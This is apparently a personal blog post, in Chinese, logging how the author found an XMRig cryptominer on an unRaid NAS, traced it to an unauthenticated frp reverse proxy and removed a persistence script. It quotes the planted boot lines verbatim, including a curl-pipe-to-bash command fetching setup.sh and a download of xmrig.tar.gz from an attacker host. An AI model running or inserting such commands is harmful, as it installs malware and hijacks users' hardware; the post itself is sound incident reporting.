unRaid被植入挖矿程序

没想到我的unRaid居然被植入了xmrig挖矿程序。

今天突然听到 NAS 机箱内的风扇在狂转，当时想着现在好像也没让它干啥活，怎么会这么响呢。当时执行了一下 htop 命令，发现 unRaid 里面居然在偷跑挖矿程序 XMRig：

29587 root        20   0 2404M  276M     8 S   0.7  0.9 30:00.95 /tmp/test/xmrig --config=/tmp/test/config_background.json

2024/05/20

今天发现，我的unRaid被谁装上了一个虚拟机，这真的吓到我了。

暂时先修改 root 密码，不知道到底是哪里泄漏了。

后面一想，unRaid只有通过frp暴露出去的，这一想，于是查看了一下 nginx 的 access.log 日志，发现居然可以直接输入 url 路径就可以了，泪崩......

我实验了另外一个通过同样方式暴露出去的 HomeAssistant容器，发现并没有这样。好吧，估计unRaid不能这样搞。

不知道被植入挖矿程序是不是就是通过这个来弄的。只能后续继续观察了......

2024/05/26

在我取消了 frp 的反向代理之后，貌似就没有被远程操作以及植入挖矿程序了。但是呢，在外面不能访问unRaid Web又很不方便。

所以考虑使用 frp 提供的 HTTP基本认证功能，试用一段时间，应该不会再出现之前的情况了吧。（好怕谁把我的资源都给删了，毕竟花了好多时间下载......）

2024/06/29

自上次发现 unRaid 反向代理出去不需要密码即可访问之后，采取了通过 OpenResty 设置账号密码验证功能。还是发现了 xmrig 有时在运行。

今天在折腾网络时，将 unRaid主机 的 HDMI 插上显示器，终于看到了一段输出：

rl:(6) Could not resolve host: c2edadfeta.mengluo.bf

这下我终于知道了，原来写入了脚本.......，而且个脚本应该位于 unRaid 启动U盘挂载的 /boot 目录下，使用 grep 一搜索，果然：

root@Tower:/boot# grep  -r "mengluo" .
./config/go:curl https://c2edadfeta.mengluo.bf/setup.sh | bash
./config/pools/setup.sh:if ! curl -L --progress-bar "https://c2edadfeta.mengluo.bf/xmrig.tar.gz" -o /tmp/xmrig.tar.gz; then

那么接下来就是需要删除 /boot/config/go 可疑的脚本内容，实际该文件默认只有几行：

#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &

所以其他可疑的，直接全部删掉。

另外，删除 /boot/config/pools/setup.sh这个脚本，这个脚本被写入了一大长串 如何下载 xmrig 挖矿程序的代码.......可恨......

至此，我想终于应该清净了吧。